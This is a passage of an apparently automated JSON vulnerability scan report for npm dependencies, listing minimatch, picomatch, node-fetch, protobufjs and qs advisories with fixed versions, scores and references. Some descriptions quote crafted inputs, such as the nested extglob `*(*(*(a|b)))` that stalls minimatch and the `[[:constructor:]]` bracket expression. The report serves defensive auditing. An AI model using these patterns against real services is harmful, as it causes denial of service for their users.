"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "f9b14aafc2d2d91a" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:05c123c14d625f6b617e9f351bf59a7a579660c6b6366a3133bfea5081ac3633", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "f9b14aafc2d2d91a" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2d5d9c4d7ac72ab1aaacee42010cd2e3f690a2d4b4c6ee8cc41d2929b1d1bd0a", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "f9b14aafc2d2d91a" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:daf45b4524cca5bf0aa5d9f7554324d1c4e09e2d78bd34f798da9d1cc4d0e278", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2022-0235", + "VendorIDs": [ + "GHSA-r683-j2x4-v87g" + ], + "PkgID": "node-fetch@1.7.3", + "PkgName": "node-fetch", + "PkgIdentifier": { + "PURL": "pkg:npm/node-fetch@1.7.3", + "UID": "e78eaaf2132ae187" + }, + "InstalledVersion": "1.7.3", + "FixedVersion": "3.1.1, 2.6.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-0235", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:aec3642a00377df236af1ec841634fc794a54aa8b6733c66cfa4b1263ee96d6b", + "Title": "node-fetch: exposure of sensitive information to an unauthorized actor", + "Description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", + "Severity": "HIGH", + "CweIDs": [ + "CWE-200", + "CWE-601" + ], + "VendorSeverity": { + "alma": 2, + "ghsa": 3, + "nvd": 2, + "oracle-oval": 2, + "redhat": 2, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.8 + }, + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V2Score": 5.8, + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2023:0050", + "https://access.redhat.com/security/cve/CVE-2022-0235", + "https://bugzilla.redhat.com/2044591", + "https://bugzilla.redhat.com/2066009", + "https://bugzilla.redhat.com/2134609", + "https://bugzilla.redhat.com/2140911", + "https://bugzilla.redhat.com/2150323", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044591", + "https://bugzilla.redhat.com/show_bug.cgi?id=2066009", + "https://bugzilla.redhat.com/show_bug.cgi?id=2134609", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140911", + "https://bugzilla.redhat.com/show_bug.cgi?id=2142821", + "https://bugzilla.redhat.com/show_bug.cgi?id=2150323", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44906", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24999", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3517", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43548", + "https://errata.almalinux.org/8/ALSA-2023-0050.html", + "https://errata.rockylinux.org/RLSA-2023:0050", + "https://github.com/node-fetch/node-fetch", + "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35", + "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10", + "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", + "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", + "https://github.com/node-fetch/node-fetch/pull/1453", + "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7", + "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7/", + "https://linux.oracle.com/cve/CVE-2022-0235.html", + "https://linux.oracle.com/errata/ELSA-2023-0050.html", + "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0235", + "https://ubuntu.com/security/notices/USN-6158-1", + "https://www.cve.org/CVERecord?id=CVE-2022-0235" + ], + "PublishedDate": "2022-01-16T17:15:07.87Z", + "LastModifiedDate": "2024-11-21T06:38:12.15Z" + }, + { + "VulnerabilityID": "CVE-2026-33671", + "VendorIDs": [ + "GHSA-c2c7-rcm5-vvqj" + ], + "PkgID": "picomatch@2.3.1", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "4893c2a2be9c6269" + }, + "InstalledVersion": "2.3.1", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:af7dde4672a5df977f78fb0d1dace6f9fa229b225fdf977f76971283e1354a1a", + "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "azure": 3, + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33671", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", + "https://www.cve.org/CVERecord?id=CVE-2026-33671" + ], + "PublishedDate": "2026-03-26T22:16:30.21Z", + "LastModifiedDate": "2026-04-01T13:45:11.687Z" + }, + { + "VulnerabilityID": "CVE-2026-33672", + "VendorIDs": [ + "GHSA-3v7f-55p6-f55p" + ], + "PkgID": "picomatch@2.3.1", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@2.3.1", + "UID": "4893c2a2be9c6269" + }, + "InstalledVersion": "2.3.1", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0fe83f1aa0027b6addbe7540b3a682baa479d2b617ca6d0e89d985d83684f6d3", + "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "azure": 2, + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33672", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", + "https://www.cve.org/CVERecord?id=CVE-2026-33672" + ], + "PublishedDate": "2026-03-26T22:16:30.387Z", + "LastModifiedDate": "2026-04-01T13:44:53.397Z" + }, + { + "VulnerabilityID": "CVE-2026-33671", + "VendorIDs": [ + "GHSA-c2c7-rcm5-vvqj" + ], + "PkgID": "picomatch@4.0.3", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "ebc01f786eb09b8f" + }, + "InstalledVersion": "4.0.3", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3ea42892a375bd5afbfc2830489cf8926777d14170cef38584d1ef17f76bf674", + "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "azure": 3, + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33671", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", + "https://www.cve.org/CVERecord?id=CVE-2026-33671" + ], + "PublishedDate": "2026-03-26T22:16:30.21Z", + "LastModifiedDate": "2026-04-01T13:45:11.687Z" + }, + { + "VulnerabilityID": "CVE-2026-33672", + "VendorIDs": [ + "GHSA-3v7f-55p6-f55p" + ], + "PkgID": "picomatch@4.0.3", + "PkgName": "picomatch", + "PkgIdentifier": { + "PURL": "pkg:npm/picomatch@4.0.3", + "UID": "ebc01f786eb09b8f" + }, + "InstalledVersion": "4.0.3", + "FixedVersion": "4.0.4, 3.0.2, 2.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:acc897aab8fc23f86fa5ac80fbbeed4511d454b170806959781ed43495a0576d", + "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", + "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "azure": 2, + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33672", + "https://github.com/micromatch/picomatch", + "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", + "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", + "https://www.cve.org/CVERecord?id=CVE-2026-33672" + ], + "PublishedDate": "2026-03-26T22:16:30.387Z", + "LastModifiedDate": "2026-04-01T13:44:53.397Z" + }, + { + "VulnerabilityID": "CVE-2026-41242", + "VendorIDs": [ + "GHSA-xq3m-2v4x-88gg" + ], + "PkgID": "protobufjs@7.5.4", + "PkgName": "protobufjs", + "PkgIdentifier": { + "PURL": "pkg:npm/protobufjs@7.5.4", + "UID": "c51ca229eeb0566c" + }, + "InstalledVersion": "7.5.4", + "FixedVersion": "8.0.1, 7.5.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41242", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:52c188faaf2795a229bcea81b6335cc125a1d9b428c73fd4a7e3e11fd5ebb2ca", + "Title": "Arbitrary code execution in protobufjs", + "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the \"type\" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-94" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", + "V40Score": 9.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 9.8 + } + }, + "References": [ + "https://github.com/protobufjs/protobuf.js", + "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75", + "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956", + "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5", + "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1", + "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg" + ], + "PublishedDate": "2026-04-18T17:16:13.983Z", + "LastModifiedDate": "2026-04-23T15:26:37.2Z" + }, + { + "VulnerabilityID": "CVE-2025-15284", + "VendorIDs": [ + "GHSA-6rw7-vpxm-498p" + ], + "PkgID": "qs@6.13.0", + "PkgName": "qs", + "PkgIdentifier": { + "PURL": "pkg:npm/qs@6.13.0", + "UID": 